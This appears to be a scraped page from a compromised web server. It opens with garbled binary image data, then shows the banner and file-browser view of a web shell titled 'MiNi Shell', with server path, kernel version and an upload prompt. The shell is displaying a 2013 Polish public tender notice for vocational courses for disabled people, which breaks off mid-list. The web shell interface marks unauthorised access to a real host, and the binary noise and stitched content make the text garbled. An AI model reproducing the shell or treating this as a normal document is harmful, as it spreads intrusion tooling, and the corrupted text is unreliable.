JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130523/201010-N-2013.html

<p class="kh_header"><b>Szczawno-Zdrój: Usługa przygotowania i przeprowadzenia kursów zawodowych w ramach Projektu pn. Kompetencje moją szansą. Osoby niepełnosprawne aktywne na rynku pracy. Nr zamówienia publicznego: ZP/PN/SZP/29/2013</b><br>
<b>Numer ogłoszenia: 201010 - 2013; data zamieszczenia: 23.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląska Agencja Rozwoju Regionalnego S.A. , ul. Szczawieńska 2, 58-310 Szczawno-Zdrój, woj. dolnośląskie, tel. 074 64 80 400, faks 074 64 80 417.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.darr.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa przygotowania i przeprowadzenia kursów zawodowych w ramach Projektu pn. Kompetencje moją szansą. Osoby niepełnosprawne aktywne na rynku pracy. Nr zamówienia publicznego: ZP/PN/SZP/29/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I Przygotowanie i przeprowadzenie kursu zawodowego pn. Specjalista ds. kadr i płac, z wykorzystaniem technologii informatycznych . - szkolenie dla 1 osoby niepełnosprawnej ruchowo; - oczekiwana lokalizacja szkolenia wg miejsca zamieszkania uczestnika(czki) szkolenia- Głogów; - ok. 180 godzin efektywnego szkolenia (plus minus 10%); - termin zakończenia kursu do 10 sierpnia br. - termin zakończenia realizacji umowy do 25 sierpnia br. Zakres szkolenia m.in.: a)Regulacje prawne zawarte w kodeksie pracy i kodeksie cywilnym b)Regulacje podatkowe związane z rozliczeniem płac, c)Prowadzenie dokumentacji kadrowo-płacowej d)Zasady naliczania wynagrodzeń i narzutu na wynagrodzenia e)Wydruki kadrowo-płacowe f)Obsługa programów płacowo-kadrowych I finansowo-księgowych (m.in. Symfonia, Gratyfikant) g)Obsługa programu Płatnik i SODIR). II Przygotowanie i przeprowadzenie kursu zawodowego pn. Kurs nowoczesnej poligrafii - szkolenie dla 2 osób niepełnosprawnych ruchowo, w miejscu przystosowanym do osób niepełnosprawnych (bez barier architektonicznych); - oczekiwana lokalizacja szkolenia wg miejsca zamieszkania uczestników(czek szkolenia- Głogów; - ok. 200 godzin efektywnego szkolenia (plus minus 10%); - termin zakończenia kursu do 10 sierpnia br. - termin zakończenia realizacji umowy do 25 sierpnia br. W tym moduły: a)obsługa programów graficznych w stopniu średnio i/lub zaawansowanym, w tym m.in: - zasady składu publikacji, - obsługa Adobe Photoshop, Corel Draw, Adobe Illustrator oraz Adobe InDesign, b)operator maszyn poligraficznych w tym m.in.: - technologia druku, - obsługa plotera solventowego (Roland XJ640) i plotera wycinającego SummaCut 120d), - obsługa laminatora, gilotyny, oklejarki, - obsługa drukarki laserowej (Xerox DucuColor 700i), - obsługa bigówko- falcarki Morgana Digifolt Pro. c)techniki digitalizacji dokumentacji, w tym m.in.:. - aspekty organizacyjno-prawne - sprzęt i oprogramowanie do digitalizacji - tworzenie bibliotek cyfrowych - opisywanie i katalogowanie obiektów cyfrowych - ocena i monitorowanie. III. Przygotowanie i przeprowadzenie kursu zawodowego pn. Nowoczesny archiwista - kurs kancelaryjno - archiwalny I i II stopnia wraz z językiem angielskim dla niedosłyszących oraz dodatkowo opcji Nowoczesny archiwista - kurs kancelaryjno - archiwalny I i II stopnia wraz z obsługą baz danych. - szkolenie dla 3 osób niepełnosprawnych, w tym 2 osoby niedosłyszące i 1 niepełnosprawna ruchowo; - ok. 130 godzin efektywnego szkolenia (plus minus 10%) dla 2 osób w przypadku opcji Nowoczesny archiwista - kurs kancelaryjno - archiwalny I i II stopnia wraz z językiem angielskim dla niedosłyszących z terminem zakończenia kursu do 15 lipca br. dla części kancelaryjno - archiwalnej oraz do 31 sierpnia br. dla części językowej; - ok. 100 godzin efektywnego szkolenia (plus minus 10%) dla 1 osoby z terminem zakończenia kursu do 19 lipca br. w przypadku opcji Nowoczesny archiwista - kurs kancelaryjno - archiwalny I i II stopnia wraz z obsługą baz danych; - oczekiwana lokalizacja szkolenia dla części kancelaryjno - archiwalnej oraz obsługi baz danych wg miejsca zamieszkania uczestników(czek szkolenia - Legnica - lokalizacja szkolenia dla części językowej uzgodniona z uczestnikami(czkami szkolenia - termin zakończenia realizacji umowy do 15 września br. W tym moduły: a)Kurs archiwisty I stopnia, w tym m.in.: - prawne podstawy postępowania z dokumentacją - dokumentacja niejawna, - rodzaje i postać dokumentacji współczesnej, - Kwalifikacja archiwalna dokumentacji i okresy przechowywania najważniejszych akt kat. archiwalnej B, - organizacja pracy kancelaryjnej w tym ćwiczenia z praktycznego posługiwania się wykazem akt, - organizacja i zakres działania archiwum zakładowego - w tym wycieczka do wzorcowego archiwum zakładowego, - archiwizowanie dokumentacji, w tym dokumentacji nieaktowej, - brakowanie dokumentacji niearchiwalnej, - postępowanie z dokumentacją likwidowanych jednostek organizacyjnych, - komputerowe systemy zarządzania dokumentacją w archiwach zakładowych. b) Kurs archiwisty II stopnia, w tym m.in.: - rozgraniczanie zespołów archiwalnych i ich rodzaje, - ustalenie przynależności zespołowej, - Archiwizowanie materiałów archiwalnych, sporządzanie noty przy przekazywaniu do archiwum państwowego, - archiwizowanie dokumentacji niearchiwalnej, - archiwizowanie innych rodzajów dokumentacji, - systemy ewidencji zasobu archiwalnego c): c1) Obsługa baz danych - nauka tworzenia i obsługi baz danych przy użyciu komputera z oprogramowaniem Access opcjonalnie c2) język angielski dla niedosłyszących w stopniu podstawowym - zajęcia za pomocą języka polskiego z możliwością użycia języka migowego IV. Przygotowanie i przeprowadzenie kursu zawodowego pn. Pracownik biura rachunkowego z wykorzystaniem programów komputerowych w pracy księgowo-kadrowej i znajomością księgowości MMŚP. - szkolenie dla 2 osób niepełnosprawnych ( w tym 1 ruchowo), w miejscu przystosowanym do osób niepełnosprawnych (bez barier architektonicznych); - oczekiwana lokalizacja szkolenia wg miejsca zamieszkania uczestników (czek szkolenia- Legnica; - ok. 200 godzin efektywnego szkolenia (plus minus 10%); - termin zakończenia kursu do 10 sierpnia br. - termin zakończenia realizacji umowy do 25 sierpnia br. Zakres szkolenia: a)Praca na stanowisku samodzielnego księgowego, zaznajomienie z podstawową wiedzą z zakresu księgowości mikro, małych i średnich przedsiębiorstw, prawa podatkowego itp. b)Elementy obsługi administracyjnej biura, w tym obsługa urządzeń administracyjno-biurowych oraz wykorzystanie w pracy programów m. in. Microsoft Excel i Word. c)Obsługa programów komputerowych wykorzystywanych w pracy księgowo - kadrowej, w tym m.in. programy Symfonia, Gratyfikant i Vulcan V. Przygotowanie i przeprowadzenie kursu zawodowego pn. Projektant i administrator stron WWW wraz z obsługą programu MS Excel. - szkolenie dla 1 osoby niepełnosprawnej ruchowo - oczekiwana lokalizacja szkolenia wg miejsca zamieszkania uczestnika(czki szkolenia-Legnica i(lub) Wrocław - ok. 100 godzin efektywnego szkolenia (plus minus 10%), - termin zakończenia kursu do 19 lipca br. - termin zakończenia realizacji umowy do 31 lipca br. W tym moduły: a)Tworzenie stron w języku HTMP i CSS i zarządzanie nimi, JavaScript, PHP b)Obsługa Microsoft Excel w stopniu podstawowym i średniozaawansowanym VI. Przygotowanie i przeprowadzenie kursu zawodowego pn. Pomoc kuchenna. - szkolenie dla 1 osoby niepełnosprawnej; - oczekiwana lokalizacja szkolenia wg miejsca zamieszkania uczestnika(czki szkolenia - Wałbrzych; - ok. 180 godzin efektywnego szkolenia (plus minus 10%); - termin zakończenia kursu do 10 sierpnia br. - termin zakończenia realizacji umowy do 25 sierpnia br. W tym moduły: a)Pomoc kucharza b)Pomoc ciastkarza-piekarza VII. Przygotowanie i przeprowadzenie kursu zawodowego pn. Programista JAVA i VBA z uprawnieniami na pomiary elektryczne. - szkolenie dla 1 osoby niepełnosprawnej; - oczekiwana lokalizacja szkolenia wg miejsca zamieszkania uczestnika(czki) szkolenia - Legnica i (lub) Wrocław; - ok. 100 godzin efektywnego szkolenia (plus minus 10%); - termin zakończenia kursu do 19 lipca br. - termin zakończenia realizacji umowy do 31 lipca br. W tym moduły: a)Programowanie w języku Java dla zaawansowanych, b)Visual Basic for Applications w Excel dla analityków, c)uprawnienia kontrolno-pomiarowe dla urządzeń z grupy 1. VIII. Przygotowanie i przeprowadzenie kursu zawodowego pn. Operator wprowadzania danych z wykorzystaniem technologii informatycznych. - szkolenie dla 2 osób niepełnosprawnych ruchowo, w miejscu przystosowanym do osób niepełnosprawnych (bez barier architektonicznych); - oczekiwana lokalizacja szkolenia wg miejsca zamieszkania uczestników (czek) szkolenia- Głogów; - ok. 150 godzin efektywnego szkolenia (plus minus 10%), - termin zakończenia kursu do 31 lipca br. - termin zakończenia realizacji umowy do 15 sierpnia br. W tym moduły: a)Operator wprowadzania danych, w tym m.in.: pisanie bezwzrokowe na klawiaturze komputera systemem dziesięciopalcowym, wprowadzanie danych za pomocą urządzeń zewnętrznych, wprowadzanie danych do aplikacji biurowych i korzystanie z baz danych, katalogowanie i zarządzanie danymi w komputerze, kompresowanie archiwizowanie, zabezpieczanie danych na różnych nośnikach itp. b)Obsługa Microsoft Excel w stopniu podstawowym i średniozaawansowanym. IX. Przygotowanie i przeprowadzenie kursu zawodowego pn. Maszynista urządzeń poligraficznych. - szkolenie dla 1 osoby niepełnosprawnej; - oczekiwana lokalizacja szkolenia wg miejsca zamieszkania uczestnika (czki szkolenia - Głogów; - ok. 150 godzin efektywnego szkolenia (plus minus 10%); - termin zakończenia kursu do 31 lipca br. - termin zakończenia realizacji umowy do 15 sierpnia br. Zakres szkolenia: a) podstawy technologii poligraficznej, b) podstawy budowy maszyn offsetowych i urządzeń poligraficznych, c) technologia druku offsetowego i przygotowalnia offsetowa, d) obsługa i konserwacja arkuszowych maszyn offsetowych, e) obsługa i konserwacja pozostałych urządzeń poligraficznych, w tym m.in. plotera solventowego (Roland XJ640) i plotera wycinającego SummaCut 120d), drukarki laserowej (Xerox DucuColor 700i), bigówko-falcarki Morgana Digifolt Pro, laminatora, gilotyny, oklejarki. X. Przygotowanie i przeprowadzenie kursu zawodowego pn. Pracownik administracyjno-biurowy wraz z profesjonalną obsługą programów komputerowych. - szkolenie dla 1 osoby niepełnosprawnej ruchowo; - oczekiwana lokalizacja szkolenia wg miejsca zamieszkania uczestnika (czki) szkolenia - Bolesławiec; - ok. 150 godzin efektywnego szkolenia (plus minus 10%); - termin zakończenia kursu do 31 lipca br. - termin zakończenia realizacji umowy do 15 sierpnia br. W tym moduły: a)praca na stanowisku administracyjno-biurowym b)obsługa urządzeń niezbędnych w pracy administracyjno-biurowej c)obsługa programów komputerowych wykorzystywanych w pracy administracyjno-biurowej, w tym m.in. Microsoft Excel i Word w stopniu podstawowym i średniozaawansowanym XI. Przygotowanie i przeprowadzenie kursu zawodowego pn. Projektant stron WWW - grafik komputerowy. - szkolenie dla 2 osób niepełnosprawnych ruchowo; - oczekiwana lokalizacja szkolenia wg miejsca zamieszkania uczestników(czek szkolenia - Legnica i (lub) Wrocław ; - ok. 180 godzin efektywnego szkolenia (plus minus 10%); - rozpoczęcie kursu po 15 czerwca, zakończenie kursu do 15 sierpnia br. - termin zakończenia realizacji umowy do 31 sierpnia br. XII. Przygotowanie i przeprowadzenie kursu zawodowego pn. Nowoczesna kosmetyczka I, II i III stopnia wraz z obsługą kas fiskalnych dla 1 osoby. - szkolenie dla 1 osoby niepełnosprawnej; - oczekiwana lokalizacja szkolenia wg miejsca zamieszkania uczestnika(czk szkolenia - Jelenia Góra, - ok. 150 godzin efektywnego szkolenia (plus minus 10%), - termin zakończenia kursu do 31 lipca br. - termin zakończenia realizacji umowy do 15 sierpnia br. W tym moduły: a)kurs kosmetyczny I stopnia, b)kurs kosmetyczny II stopnia, c)kurs kosmetyczny III stopnia, d)obsługa kas fiskalnych. W tym moduły: a)Projektowanie stron WWW , w tym m.in.: wykorzystanie HTML i CSS w tworzeniu stron WWW, JavaScript, PHP b)obsługa programów graficznych (w stopniu zaawansowanym), w tym m.in: obsługa Adobe Photoshop, Corel Draw, Adobe Illustrator oraz Adobe InDesign...</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.10.00-9, 80.53.00.00-8, 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w sposób szczegółowy. Ocena spełniania ww. warunku dokonana zostanie w oparciu o złożone oświadczenie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykazać, że w okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał: -co najmniej 5 usług szkoleniowych (szkolenia-warsztaty-kursy), z zastrzeżeniem, że każde szkolenie-warsztat-kurs było prowadzone dla co najmniej 5 uczestników/czek i obejmowało (każde z nich): nie mniej niż 100 godzin dydaktycznych, zapewnienie sal szkoleniowych, trenerów, sprzętu, pomocy dydaktycznych i wyżywienia oraz opracowanie programu i opracowanie-zapewnienie materiałów szkoleniowych. W celu potwierdzenia spełniania tego warunku Wykonawcy zobowiązani są przedłożyć: wykaz usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu-dowodu potwierdzającego, że te dostawy lub usługi zostały wykonane należycie (wzór wykazu stanowi Załącznik nr 6 do SIWZ). Dowody potwierdzające należyte wykonanie usług uwzględnionych w wykazie o którym mowa powyżej: - poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż Ne 3 miesiące przed upływem terminu składania ofert; - oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia o którym mowa powyżej. W przypadku, gdy Zamawiający jest podmiotem na rzecz którego usługi wskazane w wykazie którego wzór stanowi Załącznik nr 6 do SIWZ zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów potwierdzających należyte wykonanie usług.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w sposób szczegółowy. Ocena spełniania ww. warunku dokonana zostanie w oparciu o złożone oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy powinni wykazać iż dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniania osób zdolnych do wykonywania zamówienia, tj. a) w przypadku jeżeli Wykonawca składa ofertę na wykonanie jednej z części II i III zamówienia: minimum 2 trenerami/kami posiadającymi (każdy(a z nich) co najmniej: - wykształcenie wyższe (minimum licencjat) oraz - doświadczenie w prowadzeniu szkoleń-warsztatów-kursów-wykładów z zakresu tematycznego, z którego będą szkolić w ramach usługi - co najmniej 100 przeprowadzonych dni szkoleniowych w okresie 3 lat przed upływem terminu składania ofert, przy czym przyjmuje się, że 1 dzień szkoleniowy obejmuje 8 godzin dydaktycznych zajęć. b) w przypadku jeżeli Wykonawca składa ofertę na wykonanie jednej z części I, IV, V, VII, X i XI zamówienia: minimum 1 trenerem/ką posiadającym(ą co najmniej: - wykształcenie wyższe (minimum licencjat) oraz - doświadczenie w prowadzeniu szkoleń-warsztatów-kursów-wykładów z zakresu tematycznego, z którego będzie szkolić w ramach usługi - co najmniej 100 przeprowadzonych dni szkoleniowych w okresie 3 lat przed upływem terminu składania ofert, przy czym przyjmuje się, że 1 dzień szkoleniowy obejmuje 8 godzin dydaktycznych zajęć. c) w przypadku jeżeli Wykonawca składa ofertę na wykonanie jednej z części VI i XII zamówienia: minimum 2 trenerami(kami posiadającymi co najmniej: - wykształcenie średnie oraz - doświadczenie w prowadzeniu szkoleń-warsztatów-kursów-wykładów z zakresu tematycznego, z którego będzie szkolić w ramach usługi - co najmniej 100 przeprowadzonych dni szkoleniowych w okresie 3 lat przed upływem terminu składania ofert, przy czym przyjmuje się, że 1 dzień szkoleniowy obejmuje 8 godzin dydaktycznych zajęć. d) w przypadku jeżeli Wykonawca składa ofertę na wykonanie jednej z części VIII, IX zamówienia: minimum 1 trenerem(ką posiadającym(ą co najmniej: - wykształcenie średnie oraz - doświadczenie w prowadzeniu szkoleń-warsztatów-kursów-wykładów z zakresu tematycznego, z którego będzie szkolić w ramach usługi - co najmniej 100 przeprowadzonych dni szkoleniowych w okresie 3 lat przed upływem terminu składania ofert, przy czym przyjmuje się, że 1 dzień szkoleniowy obejmuje 8 godzin dydaktycznych zajęć. e) w przypadku jeżeli Wykonawca składa ofertę na więcej niż 1 część zamówienia - powinien wykazać iż dysponuje lub będzie dysponował odpowiednio kadrą opisaną w lit.a- d wymaganą dla każdej z części wskazanych w ofercie. Ocena spełniania ww. warunku dokonana zostanie w oparciu o Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami- wzór wykazu stanowi Załącznik nr 7 do SIWZ. W przypadku gdy Wykonawca składa ofertę na więcej niż 1 część zamówienia, ww wykaz powinien być sporządzony osobno dla każdej z części.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w sposób szczegółowy. Ocena spełniania ww. warunku dokonana zostanie w oparciu o złożone oświadczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

